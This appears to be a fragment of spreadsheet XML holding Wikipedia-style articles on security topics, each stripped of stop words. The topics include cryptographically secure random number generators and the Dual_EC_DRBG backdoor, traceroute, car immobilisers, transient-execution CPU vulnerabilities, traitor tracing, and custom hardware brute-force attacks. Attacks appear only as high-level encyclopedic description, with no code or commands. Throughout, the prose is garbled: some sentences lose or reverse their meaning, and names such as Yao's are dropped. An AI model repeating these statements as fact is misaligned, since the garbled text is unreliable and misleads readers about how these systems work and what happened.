    <t>cryptographically secure pseudorandom number generator (csprng) cryptographic pseudorandom number generator (cprng) pseudorandom number generator (prng) properties make suitable cryptography. also loosely known cryptographic random number generator (crng) (see random number generation "true" pseudo-random numbers).most cryptographic applications require random numbers, example: generation nonces salts certain signature schemes, including ecdsa, rsassa-pssthe "quality" randomness required applications varies. example, creating nonce protocols needs uniqueness. hand, generation master requires higher quality, entropy. case one-time pads, information-theoretic guarantee perfect secrecy holds material comes true random source high entropy, thus kind pseudorandom number generator insufficient. ideally, generation random numbers csprngs uses entropy obtained high-quality source, generally operating system's randomness api. however, unexpected correlations found several ostensibly independent processes. from information-theoretic point view, amount randomness, entropy generated, equal entropy provided system. sometimes, practical situations, random numbers needed entropy available. also, processes extract randomness running system slow actual practice. instances, csprng sometimes used. csprng "stretch" available entropy bits. requirements requirements ordinary prng also satisfied cryptographically secure prng, reverse true. csprng requirements fall groups: first, pass statistical randomness tests; secondly, hold well serious attack, even part initial running state becomes available attacker. every csprng satisfy next-bit test. that given first bits random sequence, polynomial-time algorithm predict (k+1)th probability success non-negligibly better 50%. andrew proved 1982 generator passing next-bit test pass polynomial-time statistical tests randomness. every csprng withstand "state compromise extensions". event part state revealed guessed correctly), impossible reconstruct stream random numbers prior revelation. additionally, entropy input running, infeasible knowledge input's state predict future conditions csprng state.example: csprng consideration produces output computing bits sequence, starting unknown point binary expansion, well satisfy next-bit test thus statistically random, appears random sequence. (this would guaranteed normal number, example.) however, algorithm cryptographically secure; attacker determines (i.e. state algorithm) currently able calculate preceding bits well.most prngs suitable csprngs fail counts. first, prngs outputs appear random assorted statistical tests, resist determined reverse engineering. specialized statistical tests found specially tuned prng shows random numbers truly random. second, prngs, state revealed, past random numbers retrodicted, allowing attacker read past messages, well future ones. csprngs designed explicitly resist type cryptanalysis. definitions asymptotic setting, family deterministic polynomial time computable functions {\displaystyle g_{k}\colon \{0,1\}^{k}\to \{0,1\}^{p(k)}} polynomial pseudorandom number generator (prng, references), stretches length input {\displaystyle p(k)&gt;k} output computationally indistinguishable true randomness, i.e. probabilistic polynomial time algorithm outputs distinguisher, {\displaystyle \left|\pr _{x\gets \{0,1\}^{k}}[a(g(x))=1]-\pr _{r\gets \{0,1\}^{p(k)}}[a(r)=1]\right|&lt;\mu (k)} negligible function {\displaystyle (the notation {\displaystyle x\gets means chosen uniformly random there equivalent characterization: function family {\displaystyle g_{k}\colon \{0,1\}^{k}\to \{0,1\}^{p(k)}} prng next output cannot predicted polynomial time algorithm.a forward-secure prng block length {\displaystyle t(k)} prng {\displaystyle g_{k}\colon \{0,1\}^{k}\to \{0,1\}^{k}\times \{0,1\}^{t(k)}} input string {\displaystyle s_{i}} length current state period output {\displaystyle s_{i+1}} {\displaystyle y_{i}} consists next state {\displaystyle s_{i+1}} pseudorandom output block {\displaystyle y_{i}} period withstands state compromise extensions following sense. initial state {\displaystyle s_{1}} chosen uniformly random {\displaystyle \{0,1\}^{k}} sequence {\displaystyle (y_{1},y_{2},\dots ,y_{i},s_{i+1})} must computationally indistinguishable {\displaystyle (r_{1},r_{2},\dots ,r_{i},s_{i+1})} {\displaystyle r_{i}} chosen uniformly random {\displaystyle \{0,1\}^{t(k)}} .any prng {\displaystyle g\colon \{0,1\}^{k}\to \{0,1\}^{p(k)}} turned forward secure prng block length {\displaystyle p(k)-k} splitting output next state actual output. this done setting {\displaystyle g(s)=g_{0}(s)\vert g_{1}(s)} {\displaystyle |g_{0}(s)|=|s|=k} {\displaystyle |g_{1}(s)|=p(k)-k} forward secure prng {\displaystyle g_{0}} next state {\displaystyle g_{1}} pseudorandom output block current period. entropy extraction santha vazirani proved several streams weak randomness combined produce higher-quality quasi-random stream. even earlier, john neumann proved simple algorithm remove considerable amount bias stream, applied stream using variation santha–vazirani design. designs discussion below, csprng designs divided three classes: based cryptographic primitives ciphers cryptographic hashes, based upon mathematical problems thought hard, special-purpose designs.the last often introduces additional entropy available and, strictly speaking, "pure" pseudorandom number generators, output completely determined initial state. this addition prevent attacks even initial state compromised. designs based cryptographic primitives secure block cipher converted csprng running counter mode. this done choosing random encrypting encrypting encrypting etc. counter also started arbitrary number zero. assuming n-bit block cipher output distinguished random data around 2n/2 blocks since, following birthday problem, colliding blocks become likely point, whereas block cipher mode never output identical blocks. 64-bit block ciphers limits safe output size gigabytes, 128-bit blocks limitation large enough impact typical applications. however, used alone meet criteria csprng stated above) since strong "state compromise extensions": knowledge state case counter key) predict past output. cryptographically secure hash counter might also good csprng cases. case, also necessary initial value counter random secret. however, little study algorithms manner, least authors warn use.most stream ciphers work generating pseudorandom stream bits combined (almost always xored) plaintext; running cipher counter return pseudorandom stream, possibly longer period. cipher secure original stream good csprng, although necessarily case (see cipher). again, initial state must kept secret. number-theoretic designs blum blum shub algorithm security proof based difficulty quadratic residuosity problem. since known solve problem factor modulus, generally regarded difficulty integer factorization provides conditional security proof blum blum shub algorithm. however algorithm inefficient therefore impractical unless extreme security needed. blum–micali algorithm security proof based difficulty discrete logarithm problem also inefficient. daniel brown certicom written 2006 security proof dual_ec_drbg, based assumed hardness decisional diffie–hellman assumption, x-logarithm problem, truncated point problem. 2006 proof explicitly assumes lower outlen dual_ec_drbg standard, dual_ec_drbg standard (which revealed 2013 probably backdoored nsa) replaced non-backdoored values. special designs there number practical prngs designed cryptographically secure, including yarrow algorithm attempts evaluate entropic quality inputs. yarrow used macos apple dec. 2019. apple switched fortuna since then. (see /dev/random). chacha20 algorithm replaced openbsd (version 5.4), netbsd (version 7.0), freebsd (version 12.0). chacha20 also replaced sha-1 linux version 4.8. fortuna algorithm, successor yarrow, attempt evaluate entropic quality inputs. fortuna used freebsd. apple changed fortuna apple beginning around dec. 2019. function cryptgenrandom provided microsoft's cryptographic application programming interface isaac based variant cipher linear-feedback shift register tuned evolutionary algorithm based nist statistical test suite. arc4random aes-ctr drbg often used random number generator systems encryption. ansi x9.17 standard (financial institution management (wholesale)), adopted fips standard well. takes input tdea (keying option bundle (the initial value 64-bit random seed each time random number required obtains current date/time maximum resolution possible. computes temporary value tdeak(d) computes random value tdeak(s denotes bitwise exclusive updates seed tdeak(x t)obviously, technique easily generalized block cipher; suggested. standards several csprngs standardized. example, fips 186-4 nist 800-90a:this withdrawn standard four prngs. uncontroversial proven: csprngs named hash_drbg hmac_drbg.the third prng standard, drbg, based block cipher running counter mode. uncontroversial design proven weaker terms distinguishing attack, security level underlying block cipher number bits output prng greater power underlying block cipher's block size bits.when maximum number bits output prng equal 2blocksize, resulting output delivers mathematically expected security level size would expected generate, output shown indistinguishable true random number generator. when maximum number bits output prng less expected security level delivered output appears indistinguishable true random number generator.it noted next revision claimed security strength ctr_drbg depends limiting total number generate requests bits provided generate request.the fourth final prng standard named dual_ec_drbg. shown cryptographically secure believed kleptographic backdoor.nist 800-90a rev.1: this essentially nist 800-90a dual_ec_drbg removed, withdrawn standard's replacement. ansi x9.17-1985 appendix ansi x9.31-1998 appendix a.2.4 ansi x9.62-1998 annex a.4, obsoleted ansi x9.62-2005, annex (hmac_drbg)a good reference maintained nist. there also standards statistical testing csprng designs: statistical test suite random pseudorandom number generators, nist special publication 800-22. kleptographic backdoor dual_ec_drbg prng guardian york times reported 2013 national security agency (nsa) inserted backdoor pseudorandom number generator (prng) nist 800-90a allows readily decrypt material encrypted dual_ec_drbg. both papers report that, independent security experts long suspected, introducing weaknesses csprng standard 800-90; confirmed first time secret documents leaked guardian edward snowden. worked covertly version nist draft security standard approved worldwide 2006. leaked document states "eventually, became sole editor." spite known potential kleptographic backdoor known significant deficiencies dual_ec_drbg, several companies security continued using dual_ec_drbg backdoor confirmed 2013. security received million payment security flaws duhk attack october 2017, shaanan cohney, matthew green, nadia heninger, cryptographers university pennsylvania johns hopkins university released details duhk (don't hard-coded keys) attack wpa2 hardware vendors hardcoded seed ansi x9.31 algorithm, stating attacker brute-force encrypted data discover rest encryption parameters deduce master encryption used encrypt sessions virtual private network (vpn) connections." japanese purple cipher machine during world japan used cipher machine diplomatic communications; united states able crack read messages, mostly "key values" used insufficiently random. references external links 4086, randomness requirements security java "entropy pool" cryptographically secure unpredictable random numbers. java standard class providing cryptographically strong pseudo-random number generator (prng). cryptographically secure random number windows without using cryptoapi conjectured security ansi-nist elliptic curve rng, daniel brown, iacr eprint 2006/117. security analysis nist 800-90 elliptic curve random number generator, daniel brown kristian gjosteen, iacr eprint 2007/048. appear crypto 2007. cryptanalysis dual elliptic curve pseudorandom generator, berry schoenmakers andrey sidorenko, iacr eprint 2006/190. efficient pseudorandom generators based assumption, reza rezaeian farashahi berry schoenmakers andrey sidorenko, iacr eprint 2006/321. analysis linux random number generator, gutterman benny pinkas tzachy reinman. nist statistical test suite documentation software download.</t>
  </si>
  <si>
    <t>Traceroute</t>
  </si>
  <si>
    <t>computing, traceroute tracert computer network diagnostic commands displaying possible routes (paths) measuring transit delays packets across internet protocol (ip) network. history route recorded round-trip times packets received successive host (remote node) route (path); mean times measure total time spent establish connection. traceroute proceeds unless (usually three) sent packets lost twice; connection lost route cannot evaluated. ping, hand, computes final round-trip times destination point. internet protocol version (ipv6) tool sometimes name traceroute6 tracert6. implementations command traceroute available many modern operating systems. unix-like systems freebsd, macos, linux available command line tool. traceroute also graphically accessible macos within network utilities suite. microsoft windows reactos provide program named tracert performs route-tracing function. windows nt-based operating systems also provide pathping, similar functionality. reactos version developed murphy licensed gpl.on unix-like operating systems, traceroute sends, default, sequence user datagram protocol (udp) packets, destination port numbers ranging 33434 33534; implementations traceroute shipped linux, freebsd, netbsd, openbsd, dragonfly bsd, macos include option icmp echo request packets (-i), arbitrary protocol (-p) udp, using packets, icmp.on windows, tracert sends icmp echo request packets, rather packets traceroute sends default.the time-to-live (ttl) value, also known limit, used determining intermediate routers traversed towards destination. traceroute sends packets values gradually increase packet packet, starting value one. routers decrement values packets routing discard packets whose value reached zero, returning icmp error message icmp time exceeded. first packets, first router receives packet, decrements value drops packet value zero. router sends icmp time exceeded message back source. next packets given value two, first router forwards packets, second router drops replies icmp time exceeded. proceeding way, traceroute uses returned icmp time exceeded messages build list routers packets traverse, destination reached returns icmp destination unreachable message packets used icmp echo reply message icmp echo messages used.the timestamp values returned router along path delay (latency) values, typically measured milliseconds packet. sender expects reply within specified number seconds. packet acknowledged within expected interval, asterisk displayed. internet protocol require packets take route towards particular destination, thus hosts listed might hosts packets traversed. host reply, skipped output. network firewall operates windows unix-like systems, protocol must enabled inbound firewall traceroute work receive replies. some traceroute implementations packets, tcptraceroute layer four traceroute (lft). pathping utility introduced windows combines ping traceroute functionality. enhanced version icmp traceroute available unix-like windows systems. various implementations traceroute rely icmp time exceeded (type packets sent source. linux, tracepath utility similar traceroute, primary difference requiring superuser privileges.cisco's implementation traceroute also uses sequence datagrams, incrementing values, invalid port number remote host; default, port 33434 used. extended version command (known extended traceroute command) change destination port number used probe messages. usage most implementations include least options specify number queries send hop, time wait response, limit port use. invoking traceroute specified options displays list available options, traceroute presents details, including displayed error flags. example linux: example above, selected options wait three seconds (instead five), send query (instead three), limit maximum number hops giving (instead 30), example.com final host. line (ttls shows asterisks router respond within timeout. traceroute used help identify incorrect routing table definitions firewalls blocking icmp traffic, high port unix ping, site. correct traceroute response guarantee connectivity applications firewall permit icmp packets permit packets protocols. traceroute also used penetration testers gather information network infrastructure address ranges around given host. also used downloading data, multiple mirrors available piece data, mirror traced idea mirror would fastest use. origins traceroute manual page states original traceroute program written jacobson 1987 suggestion steve deering, particularly cogent suggestions fixes philip wood, seaver adelman. author ping program, mike muuss, states website traceroute written using kernel icmp support earlier coded enable icmp sockets first wrote ping program. limitations traceroute limitations well known taken account using tool. example, traceroute discover paths router level, interface level. another limitation appears routers respond probes routers limit icmp responses. presence traffic load balancing, traceroute indicate path actually exist; minimize problem traceroute modification called paris-traceroute, maintains flow identifier probes avoid load balancing. also looking glass server netsniff-ng linux networking toolkit autonomous system traceroute utility references further reading frisch, æleen (2001). windows 2000 commands pocket reference. o'reilly. isbn 978-0-596-00148-3. stanek, william (2008). windows command-line administrator's pocket consultant, edition. microsoft press. isbn 978-0735622623. barrett, daniel (2012). macintosh terminal pocket guide: take command your mac. o'reilly. isbn 978-1449328986. external links 1393: traceroute using option internet traceroute works inetdaemon tracert windows command-line reference</t>
  </si>
  <si>
    <t>Cryptography standards</t>
  </si>
  <si>
    <t>there number standards related cryptography. standard algorithms protocols provide focus study; standards popular applications attract large amount cryptanalysis. encryption standards data encryption standard (des, obsolete) advanced encryption standard (aes) original public algorithm openpgp hash standards 128-bit (obsolete) sha-1 160-bit (obsolete) sha-2 available 224, 256, 384, 512-bit variants hmac keyed hash pbkdf2 derivation function (rfc 2898) digital signature standards digital signature standard (dss), based digital signature algorithm (dsa) elliptic curve public-key infrastructure (pki) standards x.509 public certificates wireless standards wired equivalent privacy (wep), severely flawed superseded wi-fi protected access (wpa) better wep, 'pre-standard' partial version 802.11i 802.11i a.k.a. wpa2, uses improvements a5/1 a5/2 cell phone encryption u.s. government federal information processing standards (fips) fips guidelines automatic data processing physical security risk management 1974 fips 46-3 data encryption standard (des) 1999 fips guidelines security computer applications 1980 fips guidelines implementing using data encryption standard 1981 fips modes operation 1980 fips guideline computer security certification accreditation 1983 fips password usage 1985, defines factors considered access control systems based passwords fips computer data authentication 1985, specifies data authentication algorithm (daa) based des, adopted department treasury banking community protect electronic fund transfers. fips 140-2 security requirements cryptographic modules 2001, defines four increasing security levels fips management using ansi x9.17 (ansi x9.17-1985) 1992, based fips 180-2 secure hash standard (shs) 2002 defines family fips automated password generator (apg) 1993 fips escrowed encryption standard (ees) 1994, escrow system provides decryption telecommunications lawfully authorized. fips 186-2 digital signature standard (dss) 2000 fips guideline advanced authentication technology alternatives 1994 fips guideline analysis local area network security 1994 fips entity authentication using public cryptography 1997 fips advanced encryption standard (aes) 2001 fips keyed-hash message authentication code (hmac) 2002 internet requests comments (rfcs) classified standards ekms nsa's electronic management system fnbdt nsa's secure narrow band voice standard fortezza encryption based portable crypto token card format secure telephone stu-iii older secure telephone tempest prevents compromising emanations other ipsec virtual private network (vpn) ieee p1363 covers aspects public-key cryptography transport layer security (formerly ssl) secure telnet content scrambling system (css, encryption standard, broken decss) kerberos authentication standard radius authentication standard ansi x9.59 electronic payment standard common criteria trusted operating system standard cryptrec japanese government's cryptography recommendations also topics cryptography</t>
  </si>
  <si>
    <t>Transterpreter</t>
  </si>
  <si>
    <t>transterpreter computer software, interpreter transputer, virtual machine programming language occam-π (occam-pi), portable runtime kroc compiler. designed education research concurrency robotics. transterpreter developed university kent. transterpeter made possible easily occam-π programs platforms lego mindstorms rcx, arduino, ia-32, sparc, mips, cell operating systems linux, macos, microsoft windows, ms-dos. also kroc references</t>
  </si>
  <si>
    <t>Transport Layer Security</t>
  </si>
  <si>
    <t>Transponder car key</t>
  </si>
  <si>
    <t>immobiliser immobilizer electronic security device fitted motor vehicle prevents engine started unless correct (transponder smart key) present. this prevents vehicle "hot wired" entry achieved thus reduces motor vehicle theft. research shows uniform application immobilisers reduced rate theft 40%. description electric immobiliser/alarm system invented george evans edward birkenbuel patented 1919. they developed grid double-contact switches panel mounted inside ignition switch activated, current battery magneto) went spark plugs allowing engine start, immobilizing vehicle sounding horn. system settings could changed time driven. modern immobiliser systems automatic, meaning owner remember activate it.immobilisers mandatory cars sold germany since january 1998, united kingdom since october 1998, finland since 1998, australia since 2001 canada since 2007. early models used static code ignition fob) recognised rfid loop around lock barrel checked vehicle's engine control unit (ecu) match. code unrecognised, allow fuel flow ignition take place. later models rolling codes advanced cryptography defeat copying code ecu. microcircuit inside activated small electromagnetic field induces current flow inside body, turn broadcasts unique binary code read automobile's ecu. when determines coded current valid, activates fuel-injection sequence. vehicles, attempts unauthorised "non-sequenced" cause vehicle activate timed no-start condition highly advanced systems, even satellite mobile phone communication alert security firm unauthorised attempt made code key. coincidentally, information often recorded modern automobile ecus, record many variables including speed, temperature, driver weight, geographic location, throttle position angle. this information used insurance investigations, warranty claims technical troubleshooting. availability add-on immobilisers available older cars vehicles come equipped factory immobilisers. insurance approval self-arming immobiliser known "thatcham motor insurance repair research centre thatcham, england. approved immobilisers must intercept least circuits; typically low-voltage ignition circuit fuel pump circuit. some also intercept low-current starter motor circuit switch relay. statistics australia show three four vehicle thefts older cars stolen joyriding, transport, commit another crime. immobilisers fitted around cars australia, account cars stolen. many instances vehicle fitted immobiliser stolen, thief access original key. only around four stolen vehicles stolen professional thieves. majority vehicles stolen opportunistic thieves relying finding older vehicles ineffective security none all.honda first motorcycle manufacturer include immobilisers products 1990s.in september 2007, transport canada regulation mandated installation engine immobilisers lightweight vehicles trucks manufactured canada. cracking numerous vulnerabilities found immobilisers designed protect modern cars theft. many vehicle immobilisers megamos-chip, proven crackable. megamos transponder many different transponders found today's immobiliser systems also comes many different versions. hacking immobiliser real world would performed vehicle, key. would faster program vehicle clone existing key, especially modern vehicles.some immobiliser systems tend remember last code long even accept non-transponder even original removed ignition minutes. effectiveness 2016 study economic journal finds immobiliser lowered overall rate theft 1995 2008. benefits terms prevented thefts least three times higher costs installing device. also anti-theft system anti-hijack system ignition interlock device on-board diagnostics#security issues vehicle theft protection program remote keyless system smart (lock) references external links motor insurance repair research centre thatcham theft deterrent program insurance bureau canada instructions replace</t>
  </si>
  <si>
    <t>Transparent data encryption</t>
  </si>
  <si>
    <t>transparent data encryption (often abbreviated tde) technology employed microsoft, oracle encrypt database files. offers encryption file level. solves problem protecting data rest, encrypting databases hard drive consequently backup media. protect data transit data use. enterprises typically employ solve compliance issues require protection data rest. microsoft offers part microsoft server 2008, 2008 2012, 2014, 2016, 2017 2019. supported evaluation, developer, enterprise datacenter editions microsoft server, also made available standard edition 2019. supported hardware security modules thales e-security, townsend security safenet, inc. offers part version 10.5 fixpack also supported cloud versions product default, cloud warehouse cloud. oracle requires oracle advanced security option oracle enable tde. oracle addresses encryption requirements associated public private privacy security mandates california 1386. oracle advanced security column encryption introduced oracle database release oracle advanced security tablespace encryption support hardware security modules (hsms) introduced oracle database 11gr1. keys stored manage keys across servers, protect keys hardware, introduce separation duties. used encrypt columns table, regardless number columns encrypted. these encryption keys encrypted using database server master stored dictionary table database. microsoft server server utilizes encryption hierarchy enables databases shared within cluster migrated instances without re-encrypting them. hierarchy consists combination symmetric asymmetric ciphers: windows data protection (dpapi) protects single instance-wide service master (smk). service master encrypts database master (dmk). database master used conjunction certificate encrypt database encryption key. database encryption used encrypt underlying database files either 3des cipher. master database contains various system level information, user accounts management services encrypted.during database backups, compression occurs encryption. fact strongly encrypted data cannot significantly compressed, backups encrypted databases require additional resources. enable automatic booting, server stores lowest level encryption keys persistent storage (using dpapi store). this presents potential security issue stored keys directly recovered live system backups used decrypt databases. also disk encryption encryption hardware security module references external links alternative party solution server editions another alternative party solution server editions enterprise security features supported microsoft server 2008 editions security features supported microsoft server 2012 editions understanding transparent data encryption (tde) (microsoft) using transparent data encryption oracle database oracle transparent data encryption best practices column encryption tablespace encryption oracle database 11gr1 http://download.oracle.com/docs/cd/b19306_01/network.102/b14268/asotrans.htm#babdfhhh p6r's pkcs#11 provider oracle</t>
  </si>
  <si>
    <t>CuBox</t>
  </si>
  <si>
    <t>cubox cubox-i series small fanless nettop-class computers manufactured israeli company solidrun ltd. they cube-shaped sized approximately inches weigh grams (0.2 oz). cubox first announced december 2011 began shipping january 2012, initially marketed cheap open-source developer platform embedded systems.the first-generation cubox according solidrun first commercially available desktop computer based marvell armada 500-series (system-on-chip) time said world's smallest desktop computer.in november 2013, solidrun released cubox-i1, i2ex, i4pro, containing i.mx6 processors. overview cubox low-power computer based arm-architecture cpu, using marvell armada (88ap510) v6/v7-compliant superscalar processor core, vivante gc600 opengl opengl capable 2d/3d graphics processing unit, marvell vmeta video decoder hardware engine, trustzone security extensions, cryptographic engines security accelerator (cesa) co-processor.despite 2-inch-square size, platform stream decode 1080p content, desktop-class interfaces gnome linux, requiring less watts less watt standby.solidrun currently officially supports linux kernel 2.6.x later android 2.2.x later. comes ubuntu desktop 10.04 android dual-boot pre-installed. newer models november 2013, solidrun released family cubox-i computers named cubox-i1, i2ex, i4pro, containing range different i.mx6 processors freescale semiconductor.they also released series caseless i.mx6 models called hummingboard. cuboxtv announced december 2014, cuboxtv mid-range simplified version cubox-i computer. designed exclusively operate kodi (formerly known xbmc) openelec operating system.cuboxtv weighs approximately 9.9oz (281 grams), around inches wide inches high, shaped like cube rounded sides. features i.mx6 quad core processor 1ghz speed, memory, base storage memory gc2000 opengl quad shader gpu. houses couple ports, hdmi port, microsd port ethernet port. also architecture home theater industrial single-board computer references external links official website cuboxtv product page</t>
  </si>
  <si>
    <t>Transient execution CPU vulnerability</t>
  </si>
  <si>
    <t>transient execution vulnerabilities vulnerabilities computer system speculative execution optimization implemented microprocessor exploited leak secret data unauthorized party. classic example spectre gave name kind side-channel attack, since january 2018 many different vulnerabilities identified. overview modern computers highly parallel devices, composed components different performance characteristics. operation (such branch) cannot performed earlier slow operation (such memory read) completed, microprocessor attempt predict result earlier operation execute later operation speculatively, acting prediction correct. prediction based recent behavior system. when earlier, slower operation completes, microprocessor determines whether prediction correct incorrect. correct execution proceeds uninterrupted; incorrect microprocessor rolls back speculatively executed operations repeats original instruction real result slow operation. specifically, transient instruction refers instruction processed error processor (incriminating branch predictor case spectre) affect micro-architectural state processor, leaving architectural state without trace execution. terms directly visible behavior computer speculatively executed code "never happened". however, speculative execution affect state certain components microprocessor, cache, effect discovered careful monitoring timing subsequent operations. attacker arrange speculatively executed code (which directly written attacker, suitable gadget found targeted system) operates secret data unauthorized access, different effect cache different values secret data, able discover value secret data. starting 2017, multiple examples vulnerabilities identified, publication starting early 2018. march 2021 security researchers discovered predictive store forwarding algorithm cpus could used malicious applications access data accessing. according phoronix there's little impact disabling feature.in june 2021, vulnerabilities, speculative code store bypass (scsb, cve-2021-0086) floating point value injection (fpvi, cve-2021-0089), affecting modern x86-64 cpus intel discovered. order mitigate software rewritten recompiled. cpus affected scsb certain architectures affected fpvi.in august 2021 vulnerability called "transient execution non-canonical accesses" affecting certain cpus undisclosed. requires mitigations vulnerability affecting certain intel cpus. assigned cve-2020-12965. since software already patched vulnerability exact mitigations, software vendors address vulnerability. october 2021 first time ever vulnerability similar meltdown disclosed affecting cpus however company think mitigations applied existing ones already sufficient.in march 2022, variant spectre vulnerability called branch history injection disclosed. affects certain arm64 cpus following intel families: cascade lake, lake, tiger lake alder lake. according linux kernel developers cpus also affected.in march 2022, vulnerability affecting wide range cpus disclosed cve-2021-26341.in june 2022, multiple mmio intel cpus vulnerabilities related execution virtual environments announced. following cves designated: cve-2022-21123, cve-2022-21125, cve-2022-21166. july 2022, retbleed vulnerability disclosed affecting intel core generation cpus generation cpus. newer intel microarchitectures well starting affected. mitigations vulnerability decrease performance affected intel cpus 39%, cpus lose 14%. august 2022, squip vulnerability disclosed affecting ryzen 2000-5000 series cpus. according existing mitigations enough protect future spectre class vulnerabilities remain unfixed otherwise designers disable oooe entail massive performance loss. vulnerabilities mitigations summary hardware mitigations require change design thus iteration hardware, impose close zero performance loss. microcode updates alter software runs requiring patches released integrated every operating system cpu. os/vmm mitigations applied operating system virtual machine level (depending workload) often incur quite significant performance loss. software recompilation requires recompiling every piece software usually incur severe performance hit. generation coffee lake architecture table also applies wide range previously released intel cpus, limited architectures based intel core, pentium intel atom starting silvermont. various microarchitectures included also affected, among power, arm, mips others.intel cpus past lake, e.g. rocket lake tiger lake affected fallout/msbds. notes stepping generation intel® xeon® scalable processors based cascade lake microarchitecture affected msbds mlpds. references external links vulnerabilities associated speculative execution systematic evaluation transient execution attacks defenses dynamic tree transient execution vulnerabilities intel, cpus transient execution attacks daniel gruss, june 2019 bugs intel: refined speculative execution terminology</t>
  </si>
  <si>
    <t>Traitor tracing</t>
  </si>
  <si>
    <t>traitor tracing schemes help trace source leaks secret proprietary data sold many customers. traitor tracing scheme, customer given different personal decryption key. (traitor tracing schemes often combined conditional access systems that, traitor tracing algorithm identifies personal decryption associated leak, content distributor revoke personal decryption key, allowing honest customers continue watch television traitor unauthorized users using traitor's personal decryption off.) traitor tracing schemes used television discourage pirate decryption discourage legitimate subscribers giving away decryption keys. traitor tracing schemes ineffective traitor rebroadcasts entire (decrypted) original content. there kinds schemes discourages pirate rebroadcast i.e., discourages legitimate subscribers giving away decrypted original content. these schemes tamper-resistant digital watermarking generate different versions original content. traitor tracing assignment schemes translated digital watermarking schemes.traitor tracing copyright infringement detection system works tracing source leaked files rather direct copy protection. method distributor adds unique salt copy given out. when copy leaked public, distributor check value trace back "leak". primary methods activation controls main concept licensee (the user) given unique unlocks software allows media decrypted. made public, content owner knows exactly database assigned codes. major attack strategy generator (keygen). reverse engineering software, code used recognise valid characterised program spit valid keys command made. practice traitor tracing often implemented computer software, evolved previous method activation codes. model, software ships unique activation number sticker label read package opened, separate cd-rom dvd-rom. this number encoded serial number, expanded usually large number string letters, digits, hyphens. when software installed, first time run, user prompted type license code. this code decoded back base serial number. this process reduces number complexity, additional information removed process used verify authenticity serial number. user mistypes single character sometimes long code, software refuse install require number retyped correct. this activation code generated packaging phase manufacture, every user receiving software different activation code. user performs "casual copy" software friend, friend must license code well software install system. since software cannot determine copy, beat basic system. with expansion computer networking, additional levels software protection evolved, "network registration" "online registration". network registration software employs additional security keeps copy actual serial number used license code. when active, broadcasting number clandestine channel local network. software installed another computer network, using license code, second copy detect serial number network typically refuse run. also cause copy already close. this prevents small business buying copy expensive software installing several computers location, provided networked. online registration process online registration similar activation codes, adds additional step. most modern companies internally networked, also connected internet. this allows software manufacturers additional check system installation process. when user enters valid license code, software immediately install. instead, uses active internet connection contact server operated software manufacturer. license code transmitted server, waits server tell whether install permitted. server maintains database serial numbers used install software. single serial number used number machines typical limit would five machines) server tells software likely copy abort installation. users usually presented dialog instructing contact manufacturer. watermarking websites offering subscriber downloads embed digital watermark download, usually readily apparent user. example, identification number embedded image, metadata date file. also possible watermark multiple copies file unique watermark recipient sending them. case embedded identification number recipient. other methods some software implements online registration extends process commonly known "phoning home". case, software, either time used preset interval monthly, makes another connection back registration server. check server serial number using determined used install many places. serial numbers identified "pirated" (illegally distributed) added blacklist server, process referred "burned". burned serial numbers cannot used install activate product. serial number lists available internet include large number valid registration codes many software titles. common software manufacturers seek lists invalidate serial numbers appear lists. this discourages individuals giving registration codes fear code later invalidated, disabling original install software next time "phones home". some expensive software requires user send personal information software vendor receiving activation code. activation code usually large sequence numbers letters, encodes information including license serial number, information ensure code valid, also includes ability verify personal information user sent software vendor. way, user's name business name must entered along registration code. registration code accepted software unless user types business name exactly submitted software vendor. business name usually displayed software opening banner whenever software used. customer gives away activation code useless without business name, anyone uses activation code must enter activation process, leaving original buyer's business name banner software. this makes easy "trace traitor" find customers originally gave activation codes. since giving away registration code violation license agreement, software vendor invalidate user's serial number (disabling user's software process) take legal action. this raise privacy concerns areas. also canary trap references</t>
  </si>
  <si>
    <t>CurveBall (security vulnerability)</t>
  </si>
  <si>
    <t>curveball (cve-2020-0601) browser security vulnerability spoofing attack discovered released 2020. exploit targets microsoft cryptoapi, program library handles cryptographic functions windows operating system. vulnerability affects microsoft edge google chrome. references</t>
  </si>
  <si>
    <t>Custom hardware attack</t>
  </si>
  <si>
    <t>cryptography, custom hardware attack uses specifically designed application-specific integrated circuits (asic) decipher encrypted messages. mounting cryptographic brute force attack requires large number similar computations: typically trying key, checking resulting decryption gives meaningful answer, trying next not. computers perform calculations rate millions second, thousands computers harnessed together distributed computing network. number computations required average grows exponentially size key, many problems standard computers fast enough. hand, many cryptographic algorithms lend fast implementation hardware, i.e. networks logic circuits, also known gates. integrated circuits (ics) constructed gates often execute cryptographic algorithms hundreds times faster general purpose computer. each contain large numbers gates (hundreds millions 2005). thus decryption circuit, cell, replicated thousands times communications requirements simple. each must initially loaded starting point space and, situations, comparison test value (see known plaintext attack). output consists signal found answer successful key. since lend mass production, thousands even millions applied single problem. mounted printed circuit boards. standard board design used different problems since communication requirements chips same. wafer-scale integration another possibility. primary limitations method cost chip design, fabrication, floor space, electric power thermal dissipation. alternative approach fpgas (field-programmable gate arrays); slower expensive gate, reprogrammed different problems. copacobana (cost-optimized parallel code breaker) machine, consisting fpgas type xilinx spartan3-1000 parallel. history earliest custom hardware attack bombe used recover enigma machine keys world 1998, custom hardware attack mounted data encryption standard cipher electronic frontier foundation. their "deep crack" machine cost u.s. $250,000 build decrypted challenge ii-2 test message hours work. confirmed cracker copacobana machine (cost-optimized parallel code breaker) built 2006. unlike deep crack, copacobana consist commercially available, reconfigurable integrated circuits. copacobana costs $10,000 build recover days average. cost decrease roughly factor machine impressive example continuous improvement digital hardware. adjusting inflation years yields even higher improvement 30x. since 2007, sciengines gmbh, spin-off company project partners copacobana enhanced developed successors copacobana. 2008 copacobana rivyera reduced time break current record less day, using spartan-3 5000's. generally believed large government code breaking organizations, u.s. national security agency, make extensive custom hardware attacks, examples declassified 2005. also twirl twinkle references external links copacobana, cost optimized code breaker analyzer fpga-based oracle rdbms passwords cracker</t>
  </si>
  <si>
    <t>Trademark (computer security)</t>
  </si>
  <si>
    <t>trademark computer security contract code verifies security properties object code requires object certain security properties. useful ensuring secure information flow. object-oriented languages, trademarking analogous signing data often implemented without cryptography. operations trademark operations: applytrademark!(object) this operation analogous private digital signature process, must exposed untrusted code. applied immutable objects, makes sure verifytrademark? called value returns true. verifytrademark?(object) this operation analogous public digital signature process, exposed untrusted code. returns true if-and-only-if, applytrademark! called given object. relationship taint checking trademarking inverse taint checking. whereas taint checking black-listing approach says certain objects trusted, trademarking white-listing approach marks certain objects certain security properties. relationship memoization apply trademark thought memoizing verification process. relationship contract verification sometimes verification process need done fact value particular security property verified statically. case, apply property used assert object produced code formally verified produce outputs particular security property. example applying trademark java: external links "protection programming languages" james morris</t>
  </si>
  <si>
